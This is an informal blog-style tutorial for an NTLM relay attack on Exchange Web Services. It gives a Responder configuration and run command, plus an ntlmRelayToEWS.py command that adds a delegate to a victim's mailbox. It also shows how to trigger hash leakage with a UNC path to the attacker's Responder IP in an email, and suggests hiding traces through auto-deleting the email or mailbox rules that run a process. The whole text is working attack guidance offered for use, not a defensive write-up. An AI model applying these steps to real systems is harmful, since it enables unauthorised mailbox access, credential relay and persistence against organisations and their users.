Exchange Mailbox Access Delegation

What is this about?

This is an NTLM relay attack pointed towards an Exchange server to do some stuff on the user’s page.

The setup

We’re going to need 2 terms, one for Responder, one for the relay script.

The Responder part

This is the tool to setup for this part. You’ll need to change the SMB/HTTP config to Off though.

; Servers to start
SQL = On
SMB = Off <- change this
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off <- change too
HTTPS = On
DNS = On
LDAP = On

You can now run your Responder with a basic

./Responder.py -I <your interface> -rv

You could throw in a -P, -w or a -b too but hey, lets keep it simple you’re going to copy paste this anyway without RTFM…

The Relaying part

Get this script and read the Usage. We’re going for the addDelegate option. This means you’ll be adding a delegated access to any given mailbox to a 3rd party user, which is usually a thing to have someone manage their calendar, emails, appointments, …

By running the following copy pasted command you’ll start the relaying server that will use the hash sent to it by Responder to identify as a user and add a delegated user to the given mailbox.

./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r addDelegate -d delegated.address@corporate.org

This is why you had to turn off the SMB/HTTP server on Responder, since it isn’t there to get the hash and send it to itself, but to relay it to the Exchange server

The Best part

This also works through emails on misconfigured on-prem Exchange servers + missing hardening on endpoints, with basic UNC paths like file://your-responder-ip/whatever in the email body. This works on distant servers too, if the matching GPOs aren’t set. You can then relay the hash to the Exchange server and get a delegated access to the mailbox of anyone pwned BY JUST RECEIVING AN EMAIL. Next step is simply an auto erase the email from the mailbox or setting a new rule to auto run a process when receiving a specific email. All of this thanks to Outlook preview option ;)

Another fun been there done that one? You know what happens when one of your users forwards an email to your security/IT team to “know if it’s phishing or something”? Yep the sender’s email is not external to your company anymore. This means the whitelisting and checks probably won’t be the same and the internal sender might go through different rules than for an external sender. Yup, you have now pwned a random user and also users with potential admin access even without knowing their email address or sending them anything because a user relayed the email to them.

Pwned by relayception! :D